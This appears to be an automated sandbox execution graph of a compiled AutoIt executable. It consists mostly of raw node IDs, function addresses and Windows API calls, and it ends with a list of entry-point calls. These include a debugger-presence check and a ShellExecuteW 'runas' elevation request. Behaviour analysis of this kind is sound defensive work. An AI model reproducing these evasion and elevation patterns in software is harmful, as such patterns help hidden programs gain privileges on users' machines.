fc5fb1 TranslateMessage DispatchMessageW GetMessageW 97612->97614 97613->97644 98856 f89fbd 60 API calls 97613->98856 98857 fd669f 341 API calls 97613->98857 97614->97614 97616 fc5fe1 97614->97616 97616->97602 97617 f90fa3 PeekMessageW 97617->97644 97618 f91005 TranslateMessage DispatchMessageW 97618->97617 97619 fc50a9 TranslateAcceleratorW 97619->97617 97619->97644 97620 f89fbd 60 API calls 97620->97644 97621 fc5b78 WaitForSingleObject 97625 fc5b95 GetExitCodeProcess CloseHandle 97621->97625 97621->97644 97623 fa0f36 59 API calls Mailbox 97623->97644 97624 f90e73 timeGetTime 97624->97644 97629 f910f5 97625->97629 97626 f90fbf Sleep 97647 f90fd0 Mailbox 97626->97647 97627 f881a7 59 API calls 97627->97644 97628 f877c7 59 API calls 97628->97647 97629->97448 97630 fc5e51 Sleep 
97630->97647 97632 fa034a timeGetTime 97632->97647 97634 f910ae timeGetTime 98854 f89fbd 60 API calls 97634->98854 97637 fc5ee8 GetExitCodeProcess 97641 fc5efe WaitForSingleObject 97637->97641 97642 fc5f14 CloseHandle 97637->97642 97639 1005f8e 110 API calls 97639->97647 97640 f8b93d 109 API calls 97640->97647 97641->97642 97641->97644 97642->97647 97644->97601 97644->97607 97644->97611 97644->97617 97644->97618 97644->97619 97644->97620 97644->97621 97644->97623 97644->97624 97644->97626 97644->97627 97644->97629 97644->97630 97644->97634 97644->97647 97660 fe9ed4 89 API calls 97644->97660 97662 f89df0 59 API calls Mailbox 97644->97662 97663 f8b89c 314 API calls 97644->97663 97664 f8a000 314 API calls 97644->97664 97665 f88620 69 API calls 97644->97665 97667 fd63f2 59 API calls Mailbox 97644->97667 97668 f88b13 69 API calls 97644->97668 97669 fc592e VariantClear 97644->97669 97670 fc59c4 VariantClear 97644->97670 97671 f88e34 59 API calls Mailbox 97644->97671 97672 fc5772 VariantClear 97644->97672 97673 fd71e5 59 API calls 97644->97673 97674 f87f41 59 API calls 97644->97674 98714 f8e580 97644->98714 98721 f8e800 97644->98721 98752 f8f5c0 97644->98752 98771 f8fe40 97644->98771 98851 f831ce IsDialogMessageW GetClassLongW 97644->98851 98858 1006081 59 API calls 97644->98858 98859 fe9abe 59 API calls Mailbox 97644->98859 98860 fdd801 59 API calls 97644->98860 98861 f89997 97644->98861 98879 fd6363 59 API calls 2 library calls 97644->98879 98880 f88561 59 API calls 97644->98880 98881 f8843f 59 API calls Mailbox 97644->98881 97646 fc5bcd 97646->97629 97647->97628 97647->97629 97647->97632 97647->97637 97647->97639 97647->97640 97647->97644 97647->97646 97648 fc53d1 Sleep 97647->97648 97649 fc5f70 Sleep 97647->97649 97651 f87f41 59 API calls 97647->97651 98882 fe2700 60 API calls 97647->98882 98883 f89fbd 60 API calls 97647->98883 98884 f88b13 69 API calls Mailbox 97647->98884 98885 f8b89c 341 API calls 97647->98885 98886 fd6830 60 API calls 97647->98886 98887 fe52eb 
QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97647->98887 98888 fe3c99 66 API calls Mailbox 97647->98888 97648->97644 97649->97644 97651->97647 97660->97644 97662->97644 97663->97644 97664->97644 97665->97644 97667->97644 97668->97644 97669->97644 97670->97644 97671->97644 97672->97644 97673->97644 97674->97644 97675->97453 97676->97425 97677->97438 97679 f87ca0 97678->97679 97680 fbefc4 97678->97680 99355 f87bb1 97679->99355 99361 fd7f03 59 API calls _memmove 97680->99361 97683 f87cac 97683->97462 97684 fbefce 97685 f881a7 59 API calls 97684->97685 97686 fbefd6 Mailbox 97685->97686 97688 f83d50 __write_nolock 97687->97688 97689 f87d2c 59 API calls 97688->97689 97695 f83eb6 Mailbox 97688->97695 97691 f83d82 97689->97691 97698 f83db8 Mailbox 97691->97698 97813 f87b52 97691->97813 97692 f87b52 59 API calls 97692->97698 97693 f83e89 97694 f87f41 59 API calls 97693->97694 97693->97695 97697 f83eaa 97694->97697 97695->97470 97696 f87f41 59 API calls 97696->97698 97699 f83f84 59 API calls 97697->97699 97698->97692 97698->97693 97698->97695 97698->97696 97700 f83f84 59 API calls 97698->97700 97699->97695 97700->97698 97816 f84d13 97701->97816 97706 f84f68 LoadLibraryExW 97826 f84cc8 97706->97826 97707 fbdc3f 97708 f84faa 84 API calls 97707->97708 97711 fbdc46 97708->97711 97713 f84cc8 3 API calls 97711->97713 97715 fbdc4e 97713->97715 97714 f84f8f 97714->97715 97716 f84f9b 97714->97716 97852 f8506b 97715->97852 97717 f84faa 84 API calls 97716->97717 97719 f837e6 97717->97719 97719->97477 97719->97478 97722 fbdc75 97860 f85027 97722->97860 97724 fbdc82 97726 f83801 97725->97726 97727 f881b2 97725->97727 97729 f893ea 97726->97729 98111 f880d7 97727->98111 97730 fa0f36 Mailbox 59 API calls 97729->97730 97731 f8380d 97730->97731 97731->97491 97733 f8862b 97732->97733 97735 f88652 97733->97735 98115 f88b13 69 API calls Mailbox 97733->98115 97735->97495 97737 f83eec 97736->97737 97738 f83f05 97736->97738 97739 f881a7 59 API calls 
97737->97739 97740 f87d2c 59 API calls 97738->97740 97741 f8388b 97739->97741 97740->97741 97742 fa307d 97741->97742 97743 fa3089 97742->97743 97744 fa30fe 97742->97744 97751 fa30ae 97743->97751 98116 fa8ca8 58 API calls __getptd_noexit 97743->98116 98118 fa3110 60 API calls 3 library calls 97744->98118 97746 fa310b 97746->97516 97748 fa3095 98117 fa8f36 9 API calls __mbschr_l 97748->98117 97750 fa30a0 97750->97516 97751->97516 97753 f89436 97752->97753 97754 fa0f36 Mailbox 59 API calls 97753->97754 97755 f89444 97754->97755 97756 f83936 97755->97756 98119 f8935c 59 API calls Mailbox 97755->98119 97758 f891b0 97756->97758 98120 f892c0 97758->98120 97760 f891bf 97761 fa0f36 Mailbox 59 API calls 97760->97761 97762 f83944 97760->97762 97761->97762 97763 f89040 97762->97763 97764 fbf4d5 97763->97764 97769 f89057 97763->97769 97764->97769 98130 f88d3b 59 API calls Mailbox 97764->98130 97766 f89158 97770 fa0f36 Mailbox 59 API calls 97766->97770 97767 f891a0 98129 f89e9c 60 API calls Mailbox 97767->98129 97769->97766 97769->97767 97771 f8915f 97769->97771 97770->97771 97771->97544 97773 f85045 85 API calls 97772->97773 97774 fe9673 97773->97774 98131 fe97dd 97774->98131 97777 f8506b 74 API calls 97778 fe96a0 97777->97778 97779 f8506b 74 API calls 97778->97779 97780 fe96b0 97779->97780 97781 f8506b 74 API calls 97780->97781 97782 fe96cb 97781->97782 97783 f8506b 74 API calls 97782->97783 97784 fe96e6 97783->97784 97785 f85045 85 API calls 97784->97785 97786 fe96fd 97785->97786 97787 fa588c __crtCompareStringA_stat 58 API calls 97786->97787 97788 fe9704 97787->97788 97789 fa588c __crtCompareStringA_stat 58 API calls 97788->97789 97790 fe970e 97789->97790 97791 f8506b 74 API calls 97790->97791 97792 fe9722 97791->97792 97793 fe91b2 GetSystemTimeAsFileTime 97792->97793 97794 fe9735 97793->97794 97795 fe975f 97794->97795 97796 fe974a 97794->97796 97797 fe97c4 97795->97797 97798 fe9765 97795->97798 97799 fa2ed5 _free 58 API calls 97796->97799 97801 fa2ed5 _free 58 API calls 
97797->97801 98137 fe8baf 116 API calls __fcloseall 97798->98137 97802 fe9750 97799->97802 97805 fbd2f1 97801->97805 97803 fa2ed5 _free 58 API calls 97802->97803 97803->97805 97804 fe97bc 97806 fa2ed5 _free 58 API calls 97804->97806 97805->97481 97807 f84faa 97805->97807 97806->97805 97808 f84fbb 97807->97808 97809 f84fb4 97807->97809 97811 f84fca 97808->97811 97812 f84fdb FreeLibrary 97808->97812 98138 fa5516 97809->98138 97811->97481 97812->97811 97814 f87faf 59 API calls 97813->97814 97815 f87b5d 97814->97815 97815->97691 97865 f84d61 97816->97865 97819 f84d3a 97821 f84d4a FreeLibrary 97819->97821 97822 f84d53 97819->97822 97820 f84d61 2 API calls 97820->97819 97821->97822 97823 fa53cb 97822->97823 97869 fa53e0 97823->97869 97825 f84f5c 97825->97706 97825->97707 98029 f84d94 97826->98029 97829 f84ced 97830 f84d08 97829->97830 97831 f84cff FreeLibrary 97829->97831 97833 f84dd0 97830->97833 97831->97830 97832 f84d94 2 API calls 97832->97829 97834 fa0f36 Mailbox 59 API calls 97833->97834 97835 f84de5 97834->97835 97836 f8538e 59 API calls 97835->97836 97837 f84df1 _memmove 97836->97837 97838 f84e2c 97837->97838 97840 f84ee9 97837->97840 97841 f84f21 97837->97841 97839 f85027 69 API calls 97838->97839 97848 f84e35 97839->97848 98033 f84fe9 CreateStreamOnHGlobal 97840->98033 98044 fe99c4 95 API calls 97841->98044 97844 f8506b 74 API calls 97844->97848 97846 f84ec9 97846->97714 97847 fbdc00 97849 f85045 85 API calls 97847->97849 97848->97844 97848->97846 97848->97847 98039 f85045 97848->98039 97850 fbdc14 97849->97850 97851 f8506b 74 API calls 97850->97851 97851->97846 97853 f8507d 97852->97853 97854 fbdd26 97852->97854 98068 fa5752 97853->98068 97857 fe91b2 98088 fe9008 97857->98088 97859 fe91c8 97859->97722 97861 fbdce9 97860->97861 97862 f85036 97860->97862 98093 fa5dd0 97862->98093 97864 f8503e 97864->97724 97866 f84d2e 97865->97866 97867 f84d6a LoadLibraryA 97865->97867 97866->97819 97866->97820 97867->97866 97868 f84d7b GetProcAddress 97867->97868 97868->97866 
97872 fa53ec _flsall 97869->97872 97870 fa53ff 97918 fa8ca8 58 API calls __getptd_noexit 97870->97918 97872->97870 97874 fa5430 97872->97874 97873 fa5404 97919 fa8f36 9 API calls __mbschr_l 97873->97919 97888 fb0668 97874->97888 97877 fa5435 97878 fa544b 97877->97878 97879 fa543e 97877->97879 97881 fa5475 97878->97881 97882 fa5455 97878->97882 97920 fa8ca8 58 API calls __getptd_noexit 97879->97920 97903 fb0787 97881->97903 97921 fa8ca8 58 API calls __getptd_noexit 97882->97921 97883 fa540f _flsall @_EH4_CallFilterFunc@8 97883->97825 97889 fb0674 _flsall 97888->97889 97890 fa9d8b __lock 58 API calls 97889->97890 97891 fb0682 97890->97891 97892 fb06fd 97891->97892 97898 fa9e13 __mtinitlocknum 58 API calls 97891->97898 97901 fb06f6 97891->97901 97926 fa6dcd 59 API calls __lock 97891->97926 97927 fa6e37 LeaveCriticalSection LeaveCriticalSection _doexit 97891->97927 97928 fa899d 58 API calls 2 library calls 97892->97928 97895 fb0704 97895->97901 97929 fa9fab InitializeCriticalSectionAndSpinCount 97895->97929 97896 fb0773 _flsall 97896->97877 97898->97891 97900 fb072a EnterCriticalSection 97900->97901 97923 fb077e 97901->97923 97904 fb07a7 __wopenfile 97903->97904 97905 fb07c1 97904->97905 97917 fb097c 97904->97917 97936 fa394b 60 API calls 2 library calls 97904->97936 97934 fa8ca8 58 API calls __getptd_noexit 97905->97934 97907 fb07c6 97935 fa8f36 9 API calls __mbschr_l 97907->97935 97909 fb09df 97931 fb8721 97909->97931 97910 fa5480 97922 fa54a2 LeaveCriticalSection LeaveCriticalSection _fprintf 97910->97922 97913 fb0975 97913->97917 97937 fa394b 60 API calls 2 library calls 97913->97937 97915 fb0994 97915->97917 97938 fa394b 60 API calls 2 library calls 97915->97938 97917->97905 97917->97909 97918->97873 97919->97883 97920->97883 97921->97883 97922->97883 97930 fa9ef5 LeaveCriticalSection 97923->97930 97925 fb0785 97925->97896 97926->97891 97927->97891 97928->97895 97929->97900 97930->97925 97939 fb7f05 97931->97939 97933 fb873a 97933->97910 97934->97907 97935->97910 
97936->97913 97937->97915 97938->97917 97940 fb7f11 _flsall 97939->97940 97941 fb7f27 97940->97941 97944 fb7f5d 97940->97944 98026 fa8ca8 58 API calls __getptd_noexit 97941->98026 97943 fb7f2c 98027 fa8f36 9 API calls __mbschr_l 97943->98027 97950 fb7fce 97944->97950 97947 fb7f79 98028 fb7fa2 LeaveCriticalSection __unlock_fhandle 97947->98028 97949 fb7f36 _flsall 97949->97933 97951 fb7fee 97950->97951 97952 fa465a __wsopen_nolock 58 API calls 97951->97952 97955 fb800a 97952->97955 97953 fa8f46 __invoke_watson 8 API calls 97954 fb8720 97953->97954 97956 fb7f05 __wsopen_helper 103 API calls 97954->97956 97957 fb8044 97955->97957 97960 fb8067 97955->97960 97973 fb8141 97955->97973 97958 fb873a 97956->97958 97959 fa8c74 __set_osfhnd 58 API calls 97957->97959 97958->97947 97961 fb8049 97959->97961 97964 fb8125 97960->97964 97971 fb8103 97960->97971 97962 fa8ca8 __mbschr_l 58 API calls 97961->97962 97963 fb8056 97962->97963 97965 fa8f36 __mbschr_l 9 API calls 97963->97965 97966 fa8c74 __set_osfhnd 58 API calls 97964->97966 97967 fb8060 97965->97967 97968 fb812a 97966->97968 97967->97947 97969 fa8ca8 __mbschr_l 58 API calls 97968->97969 97970 fb8137 97969->97970 97972 fa8f36 __mbschr_l 9 API calls 97970->97972 97974 fad414 __alloc_osfhnd 61 API calls 97971->97974 97972->97973 97973->97953 97975 fb81d1 97974->97975 97976 fb81db 97975->97976 97977 fb81fe 97975->97977 97979 fa8c74 __set_osfhnd 58 API calls 97976->97979 97978 fb7e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 97977->97978 97988 fb8220 97978->97988 97980 fb81e0 97979->97980 97982 fa8ca8 __mbschr_l 58 API calls 97980->97982 97981 fb829e GetFileType 97985 fb82eb 97981->97985 97986 fb82a9 GetLastError 97981->97986 97984 fb81ea 97982->97984 97983 fb826c GetLastError 97989 fa8c87 __dosmaperr 58 API calls 97983->97989 97990 fa8ca8 __mbschr_l 58 API calls 97984->97990 97996 fad6aa __set_osfhnd 59 API calls 97985->97996 97987 fa8c87 __dosmaperr 58 API calls 97986->97987 97991 fb82d0 CloseHandle 
97987->97991 97988->97981 97988->97983 97992 fb7e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 97988->97992 97993 fb8291 97989->97993 97990->97967 97991->97993 97994 fb82de 97991->97994 97995 fb8261 97992->97995 97998 fa8ca8 __mbschr_l 58 API calls 97993->97998 97997 fa8ca8 __mbschr_l 58 API calls 97994->97997 97995->97981 97995->97983 98001 fb8309 97996->98001 97999 fb82e3 97997->97999 97998->97973 97999->97993 98000 fb84c4 98000->97973 98004 fb8697 CloseHandle 98000->98004 98001->98000 98002 fb1a41 __lseeki64_nolock 60 API calls 98001->98002 98017 fb838a 98001->98017 98003 fb8373 98002->98003 98007 fa8c74 __set_osfhnd 58 API calls 98003->98007 98022 fb8392 98003->98022 98005 fb7e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98004->98005 98006 fb86be 98005->98006 98009 fb854e 98006->98009 98010 fb86c6 GetLastError 98006->98010 98007->98017 98008 fb0fdb 70 API calls __read_nolock 98008->98022 98009->97973 98011 fa8c87 __dosmaperr 58 API calls 98010->98011 98012 fb86d2 98011->98012 98014 fad5bd __free_osfhnd 59 API calls 98012->98014 98013 fb0c5d __close_nolock 61 API calls 98013->98022 98014->98009 98015 fb9922 __chsize_nolock 82 API calls 98015->98022 98016 fada06 __write 78 API calls 98016->98017 98017->98000 98017->98016 98020 fb1a41 60 API calls __lseeki64_nolock 98017->98020 98017->98022 98018 fb8541 98021 fb0c5d __close_nolock 61 API calls 98018->98021 98019 fb852a 98019->98000 98020->98017 98024 fb8548 98021->98024 98022->98008 98022->98013 98022->98015 98022->98017 98022->98018 98022->98019 98023 fb1a41 60 API calls __lseeki64_nolock 98022->98023 98023->98022 98025 fa8ca8 __mbschr_l 58 API calls 98024->98025 98025->98009 98026->97943 98027->97949 98028->97949 98030 f84ce1 98029->98030 98031 f84d9d LoadLibraryA 98029->98031 98030->97829 98030->97832 98031->98030 98032 f84dae GetProcAddress 98031->98032 98032->98030 98034 f85020 98033->98034 98035 f85003 FindResourceExW 98033->98035 98034->97838 98035->98034 98036 fbdc8c 
LoadResource 98035->98036 98036->98034 98037 fbdca1 SizeofResource 98036->98037 98037->98034 98038 fbdcb5 LockResource 98037->98038 98038->98034 98040 f85054 98039->98040 98041 fbdd04 98039->98041 98045 fa59bd 98040->98045 98043 f85062 98043->97848 98044->97838 98046 fa59c9 _flsall 98045->98046 98047 fa59db 98046->98047 98048 fa5a01 98046->98048 98058 fa8ca8 58 API calls __getptd_noexit 98047->98058 98060 fa6d8e 98048->98060 98051 fa59e0 98059 fa8f36 9 API calls __mbschr_l 98051->98059 98052 fa5a07 98066 fa592e 83 API calls 5 library calls 98052->98066 98055 fa5a16 98067 fa5a38 LeaveCriticalSection LeaveCriticalSection _fprintf 98055->98067 98057 fa59eb _flsall 98057->98043 98058->98051 98059->98057 98061 fa6d9e 98060->98061 98062 fa6dc0 EnterCriticalSection 98060->98062 98061->98062 98063 fa6da6 98061->98063 98065 fa6db6 98062->98065 98064 fa9d8b __lock 58 API calls 98063->98064 98064->98065 98065->98052 98066->98055 98067->98057 98071 fa576d 98068->98071 98070 f8508e 98070->97857 98072 fa5779 _flsall 98071->98072 98073 fa57bc 98072->98073 98074 fa578f _memset 98072->98074 98083 fa57b4 _flsall 98072->98083 98075 fa6d8e __lock_file 59 API calls 98073->98075 98084 fa8ca8 58 API calls __getptd_noexit 98074->98084 98076 fa57c2 98075->98076 98086 fa558d 72 API calls 6 library calls 98076->98086 98079 fa57a9 98085 fa8f36 9 API calls __mbschr_l 98079->98085 98080 fa57d8 98087 fa57f6 LeaveCriticalSection LeaveCriticalSection _fprintf 98080->98087 98083->98070 98084->98079 98085->98083 98086->98080 98087->98083 98091 fa537a GetSystemTimeAsFileTime 98088->98091 98090 fe9017 98090->97859 98092 fa53a8 __aulldiv 98091->98092 98092->98090 98094 fa5ddc _flsall 98093->98094 98095 fa5dee 98094->98095 98096 fa5e03 98094->98096 98107 fa8ca8 58 API calls __getptd_noexit 98095->98107 98098 fa6d8e __lock_file 59 API calls 98096->98098 98099 fa5e09 98098->98099 98109 fa5a40 67 API calls 6 library calls 98099->98109 98100 fa5df3 98108 fa8f36 9 API calls __mbschr_l 98100->98108 98103 
fa5e14 98110 fa5e34 LeaveCriticalSection LeaveCriticalSection _fprintf 98103->98110 98105 fa5e26 98106 fa5dfe _flsall 98105->98106 98106->97864 98107->98100 98108->98106 98109->98103 98110->98105 98112 f880fa _memmove 98111->98112 98113 f880e7 98111->98113 98112->97726 98113->98112 98114 fa0f36 Mailbox 59 API calls 98113->98114 98114->98112 98115->97735 98116->97748 98117->97750 98118->97746 98119->97756 98121 f892c9 Mailbox 98120->98121 98122 fbf4f8 98121->98122 98127 f892d3 98121->98127 98123 fa0f36 Mailbox 59 API calls 98122->98123 98125 fbf504 98123->98125 98124 f892da 98124->97760 98127->98124 98128 f89df0 59 API calls Mailbox 98127->98128 98128->98127 98129->97771 98130->97769 98136 fe97f1 __tzset_nolock _wcscmp 98131->98136 98132 f8506b 74 API calls 98132->98136 98133 fe9685 98133->97777 98133->97805 98134 fe91b2 GetSystemTimeAsFileTime 98134->98136 98135 f85045 85 API calls 98135->98136 98136->98132 98136->98133 98136->98134 98136->98135 98137->97804 98139 fa5522 _flsall 98138->98139 98140 fa554e 98139->98140 98141 fa5536 98139->98141 98143 fa6d8e __lock_file 59 API calls 98140->98143 98148 fa5546 _flsall 98140->98148 98167 fa8ca8 58 API calls __getptd_noexit 98141->98167 98145 fa5560 98143->98145 98144 fa553b 98168 fa8f36 9 API calls __mbschr_l 98144->98168 98151 fa54aa 98145->98151 98148->97808 98152 fa54b9 98151->98152 98153 fa54cd 98151->98153 98213 fa8ca8 58 API calls __getptd_noexit 98152->98213 98159 fa54c9 98153->98159 98170 fa4bad 98153->98170 98155 fa54be 98214 fa8f36 9 API calls __mbschr_l 98155->98214 98169 fa5585 LeaveCriticalSection LeaveCriticalSection _fprintf 98159->98169 98163 fa54e7 98187 fb0b82 98163->98187 98165 fa54ed 98165->98159 98166 fa2ed5 _free 58 API calls 98165->98166 98166->98159 98167->98144 98168->98148 98169->98148 98171 fa4be4 98170->98171 98172 fa4bc0 98170->98172 98176 fb0cf7 98171->98176 98172->98171 98173 fa4856 __stbuf 58 API calls 98172->98173 98174 fa4bdd 98173->98174 98215 fada06 98174->98215 98177 fa54e1 
98176->98177 98178 fb0d04 98176->98178 98180 fa4856 98177->98180 98178->98177 98179 fa2ed5 _free 58 API calls 98178->98179 98179->98177 98181 fa4860 98180->98181 98182 fa4875 98180->98182 98350 fa8ca8 58 API calls __getptd_noexit 98181->98350 98182->98163 98184 fa4865 98351 fa8f36 9 API calls __mbschr_l 98184->98351 98186 fa4870 98186->98163 98188 fb0b8e _flsall 98187->98188 98189 fb0b9b 98188->98189 98190 fb0bb2 98188->98190 98367 fa8c74 58 API calls __getptd_noexit 98189->98367 98192 fb0c3d 98190->98192 98195 fb0bc2 98190->98195 98372 fa8c74 58 API calls __getptd_noexit 98192->98372 98194 fb0ba0 98368 fa8ca8 58 API calls __getptd_noexit 98194->98368 98196 fb0bea 98195->98196 98197 fb0be0 98195->98197 98201 fad386 ___lock_fhandle 59 API calls 98196->98201 98369 fa8c74 58 API calls __getptd_noexit 98197->98369 98198 fb0be5 98373 fa8ca8 58 API calls __getptd_noexit 98198->98373 98203 fb0bf0 98201->98203 98205 fb0c0e 98203->98205 98206 fb0c03 98203->98206 98204 fb0c49 98374 fa8f36 9 API calls __mbschr_l 98204->98374 98370 fa8ca8 58 API calls __getptd_noexit 98205->98370 98352 fb0c5d 98206->98352 98209 fb0ba7 _flsall 98209->98165 98211 fb0c09 98371 fb0c35 LeaveCriticalSection __unlock_fhandle 98211->98371 98213->98155 98214->98159 98216 fada12 _flsall 98215->98216 98217 fada1f 98216->98217 98218 fada36 98216->98218 98316 fa8c74 58 API calls __getptd_noexit 98217->98316 98220 fadad5 98218->98220 98222 fada4a 98218->98222 98322 fa8c74 58 API calls __getptd_noexit 98220->98322 98221 fada24 98317 fa8ca8 58 API calls __getptd_noexit 98221->98317 98225 fada68 98222->98225 98226 fada72 98222->98226 98318 fa8c74 58 API calls __getptd_noexit 98225->98318 98243 fad386 98226->98243 98227 fada6d 98323 fa8ca8 58 API calls __getptd_noexit 98227->98323 98230 fada78 98232 fada8b 98230->98232 98233 fada9e 98230->98233 98252 fadaf5 98232->98252 98319 fa8ca8 58 API calls __getptd_noexit 98233->98319 98234 fadae1 98324 fa8f36 9 API calls __mbschr_l 98234->98324 98238 fada2b _flsall 
98238->98171 98239 fada97 98321 fadacd LeaveCriticalSection __unlock_fhandle 98239->98321 98240 fadaa3 98320 fa8c74 58 API calls __getptd_noexit 98240->98320 98244 fad392 _flsall 98243->98244 98245 fad3e1 EnterCriticalSection 98244->98245 98246 fa9d8b __lock 58 API calls 98244->98246 98247 fad407 _flsall 98245->98247 98248 fad3b7 98246->98248 98247->98230 98249 fad3cf 98248->98249 98325 fa9fab InitializeCriticalSectionAndSpinCount 98248->98325 98326 fad40b LeaveCriticalSection _doexit 98249->98326 98253 fadb02 __write_nolock 98252->98253 98254 fadb60 98253->98254 98255 fadb41 98253->98255 98286 fadb36 98253->98286 98260 fadbb8 98254->98260 98261 fadb9c 98254->98261 98336 fa8c74 58 API calls __getptd_noexit 98255->98336 98256 fac776 __fltin2 6 API calls 98258 fae356 98256->98258 98258->98239 98259 fadb46 98337 fa8ca8 58 API calls __getptd_noexit 98259->98337 98263 fadbd1 98260->98263 98342 fb1a41 60 API calls 3 library calls 98260->98342 98339 fa8c74 58 API calls __getptd_noexit 98261->98339 98327 fb5deb 98263->98327 98265 fadb4d 98338 fa8f36 9 API calls __mbschr_l 98265->98338 98268 fadba1 98340 fa8ca8 58 API calls __getptd_noexit 98268->98340 98270 fadbdf 98273 fadf38 98270->98273 98343 fa9b2c 58 API calls 2 library calls 98270->98343 98272 fadba8 98341 fa8f36 9 API calls __mbschr_l 98272->98341 98275 fae2cb WriteFile 98273->98275 98276 fadf56 98273->98276 98278 fadf2b GetLastError 98275->98278 98288 fadef8 98275->98288 98279 fae07a 98276->98279 98285 fadf6c 98276->98285 98278->98288 98289 fae16f 98279->98289 98291 fae085 98279->98291 98280 fae304 98280->98286 98348 fa8ca8 58 API calls __getptd_noexit 98280->98348 98281 fadc0b GetConsoleMode 98281->98273 98282 fadc4a 98281->98282 98282->98273 98283 fadc5a GetConsoleCP 98282->98283 98283->98280 98311 fadc89 98283->98311 98284 fadfdb WriteFile 98284->98278 98290 fae018 98284->98290 98285->98280 98285->98284 98286->98256 98288->98280 98288->98286 98293 fae058 98288->98293 98289->98280 98294 fae1e4 WideCharToMultiByte 
98289->98294 98290->98285 98295 fae03c 98290->98295 98291->98280 98296 fae0ea WriteFile 98291->98296 98292 fae332 98349 fa8c74 58 API calls __getptd_noexit 98292->98349 98298 fae2fb 98293->98298 98299 fae063 98293->98299 98294->98278 98309 fae22b 98294->98309 98295->98288 98296->98278 98301 fae139 98296->98301 98347 fa8c87 58 API calls 3 library calls 98298->98347 98345 fa8ca8 58 API calls __getptd_noexit 98299->98345 98301->98288 98301->98291 98301->98295 98303 fae233 WriteFile 98307 fae286 GetLastError 98303->98307 98303->98309 98304 fae068 98346 fa8c74 58 API calls __getptd_noexit 98304->98346 98307->98309 98308 fb643a 60 API calls __write_nolock 98308->98311 98309->98288 98309->98289 98309->98295 98309->98303 98310 fb7bde WriteConsoleW CreateFileW __putwch_nolock 98314 fadddf 98310->98314 98311->98288 98311->98308 98312 fadd72 WideCharToMultiByte 98311->98312 98311->98314 98344 fa3775 58 API calls __isleadbyte_l 98311->98344 98312->98288 98313 faddad WriteFile 98312->98313 98313->98278 98313->98314 98314->98278 98314->98288 98314->98310 98314->98311 98315 fade07 WriteFile 98314->98315 98315->98278 98315->98314 98316->98221 98317->98238 98318->98227 98319->98240 98320->98239 98321->98238 98322->98227 98323->98234 98324->98238 98325->98249 98326->98245 98328 fb5e03 98327->98328 98329 fb5df6 98327->98329 98331 fb5e0f 98328->98331 98332 fa8ca8 __mbschr_l 58 API calls 98328->98332 98330 fa8ca8 __mbschr_l 58 API calls 98329->98330 98333 fb5dfb 98330->98333 98331->98270 98334 fb5e30 98332->98334 98333->98270 98335 fa8f36 __mbschr_l 9 API calls 98334->98335 98335->98333 98336->98259 98337->98265 98338->98286 98339->98268 98340->98272 98341->98286 98342->98263 98343->98281 98344->98311 98345->98304 98346->98286 98347->98286 98348->98292 98349->98286 98350->98184 98351->98186 98375 fad643 98352->98375 98354 fb0c6b 98355 fb0cc1 98354->98355 98357 fb0c9f 98354->98357 98359 fad643 __chsize_nolock 58 API calls 98354->98359 98388 fad5bd 59 API calls 2 library calls 
[Execution graph: the interactive call-graph rendering from the original report survives here only as a raw node and edge list (node ids such as 98355->98388, hex function addresses such as fad643, and per-node API-call counts). Windows API calls named on the graph nodes: GetLongPathNameW, CloseHandle, GetLastError, ReadFile, SetFilePointerEx, SetCurrentDirectoryW, GetStringTypeW, DestroyIcon, GetFileAttributesW, FindFirstFileW, FindClose, CharUpperBuffW, PostQuitMessage, DefWindowProcW, SetTimer, RegisterWindowMessageW, CreatePopupMenu, KillTimer, Shell_NotifyIconW, MoveWindow, SetFocus, DeleteObject, DestroyWindow, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetVersionExW, GetCurrentProcess, IsWow64Process, GetSystemInfo, GetNativeSystemInfo, LoadLibraryA, GetProcAddress, FreeLibrary, GetPEB, Sleep, GetStdHandle, OleInitialize, CreateThread. CRT helpers such as _memmove, _memset, _free, _wcscpy and __cinit also appear as node labels.]
                        APIs
                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F83B7A
                        • IsDebuggerPresent.KERNEL32 ref: 00F83B8C
                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,010452F8,010452E0,?,?), ref: 00F83BFD
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                          • Part of subcall function 00F90A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F83C26,010452F8,?,?,?), ref: 00F90ACE
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F83C81
                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,01037770,00000010), ref: 00FBD3EC
                        • SetCurrentDirectoryW.KERNEL32(?,010452F8,?,?,?), ref: 00FBD424
                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01034260,010452F8,?,?,?), ref: 00FBD4AA
                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 00FBD4B1
                          • Part of subcall function 00F83A58: GetSysColorBrush.USER32(0000000F), ref: 00F83A62
                          • Part of subcall function 00F83A58: LoadCursorW.USER32(00000000,00007F00), ref: 00F83A71
                          • Part of subcall function 00F83A58: LoadIconW.USER32(00000063), ref: 00F83A88
                          • Part of subcall function 00F83A58: LoadIconW.USER32(000000A4), ref: 00F83A9A
                          • Part of subcall function 00F83A58: LoadIconW.USER32(000000A2), ref: 00F83AAC
                          • Part of subcall function 00F83A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F83AD2
                          • Part of subcall function 00F83A58: RegisterClassExW.USER32(?), ref: 00F83B28
                          • Part of subcall function 00F839E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F83A15
                          • Part of subcall function 00F839E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F83A36
                          • Part of subcall function 00F839E7: ShowWindow.USER32(00000000,?,?), ref: 00F83A4A
                          • Part of subcall function 00F839E7: ShowWindow.USER32(00000000,?,?), ref: 00F83A53
                          • Part of subcall function 00F843DB: _memset.LIBCMT ref: 00F84401
                          • Part of subcall function 00F843DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F844A6
                        Strings
                        • runas, xrefs: 00FBD4A5
                        • This is a third-party compiled AutoIt script., xrefs: 00FBD3E4
                        Memory Dump Source
